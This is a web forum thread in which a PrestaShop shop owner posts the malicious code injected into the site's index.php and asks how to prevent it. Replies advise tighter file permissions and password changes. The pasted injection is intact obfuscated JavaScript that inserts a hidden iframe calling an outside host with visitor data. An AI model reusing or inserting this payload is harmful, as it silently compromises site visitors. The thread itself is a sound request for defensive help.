Site hacked

[Stefanf90]

My Prestashop was hacked some days ago this code was added on the index.php:

<?php

include(dirname(__FILE__).'/config/config.inc.php');

if(intval(Configuration::get('PS_REWRITING_SETTINGS')) === 1)
   $rewrited_url = __PS_BASE_URI__;

include(dirname(__FILE__).'/header.php');

$smarty->assign('HOOK_HOME', Module::hookExec('home'));
$smarty->display(_PS_THEME_DIR_.'index.tpl');

include(dirname(__FILE__).'/footer.php');

?>
<!--Injection_head[sessionId=42562BEB,version=2.0,type=FindDomainName,CRC32=1400A8C8]-->[removed]var uid = '414300', path='VwsdBA8OFhxdDBwICxsHBxoCCkEcBUEXDQ0eAA04EBsfBUEOFgsXEUAXEB8=', host=String.fromCharCode(100,108,45,115,101,114,118,46,99,111,109);[removed][removed]var PyST41 = "e"; eval("var SNmr81 = /k"+"ok"+"o11/i"+"g"); var nBwJ82 = "%"; var HPHb31 = "koko1164koko116Fkoko1163koko1175koko116Dkoko1165koko116Ekoko1174koko112Ekoko1162koko116Fkoko1164koko1179koko112Ekoko1169koko116Ekoko116Ekoko1165koko1172koko1148koko1154koko114Dkoko114Ckoko113Dkoko1164koko116Fkoko1163koko1175koko116Dkoko1165koko116Ekoko1174koko112Ekoko1162koko116Fkoko1164koko1179koko112Ekoko1169koko116Ekoko116Ekoko1165koko1172koko1148koko1154koko114Dkoko114Ckoko1120koko112Bkoko1120koko1127koko113Ckoko1169koko1166koko1172koko1161koko116Dkoko1165koko1120koko1173koko1172koko1163koko113Dkoko1122koko1168koko1174koko1174koko1170koko113Akoko112Fkoko112Fkoko1127koko112Bkoko1168koko116Fkoko1173koko1174koko112Bkoko1127koko112Fkoko1172koko1165koko1163koko1169koko1165koko1176koko1165koko1172koko112Ekoko1170koko1168koko1170koko113Fkoko1175koko1169koko1164koko113Dkoko1127koko112Bkoko1175koko1169koko1164koko112Bkoko1127koko1126koko1170koko1161koko1174koko1168koko113Dkoko1127koko112Bkoko1170koko1161koko1174koko1168koko112Bkoko1127koko1126koko1168koko1172koko1165koko1166koko113Dkoko1127koko112Bkoko116Ckoko116Fkoko1163koko1161koko1174koko1169koko116Fkoko116Ekoko112Ekoko1168koko1172koko1165koko1166koko112Bkoko1127koko1122koko1120koko1173koko1174koko1179koko116Ckoko1165koko1120koko113Dkoko1120koko1122koko1164koko1169koko1173koko1170koko116Ckoko1161koko1179koko113Akoko116Ekoko116Fkoko116Ekoko1165koko1122koko1120koko113Ekoko113Ckoko112Fkoko1169koko1166koko1172koko1161koko116Dkoko1165koko113Ekoko1127koko113B"; var tpsH92 = document.createElement("script"); tpsH92.type = "text/javascript"; tpsH92.text = window["un"+PyST41+"sc"+"ap"+PyST41+""](HPHb31["r"+""+PyST41+"p"+"lac"+PyST41](SNmr81,nBwJ82)); document.body["app"+PyST41+"ndChild"](tpsH92); [removed]<!--Injection_tail[sessionId=42562BEB]-->

You see at the last line that there is a code injection. Does anyone know how this could happen? What do I've to fix at my shop so this never happens again?

[rocky]

Are you using chmod 777 permissions? Those permissions are unsafe and allow anyone to modify your files. You should use chmod 755 for directories and chmod 644 for files to prevent the files being modified by an unauthorised person.

[jhnstcks]

You should also change all your passwords for cpanel, ftp back office, and also any passwords for your pc.

Most security breachs occur because your pc has been infected by some kind of virus or trojan and they then access your ftp through your password.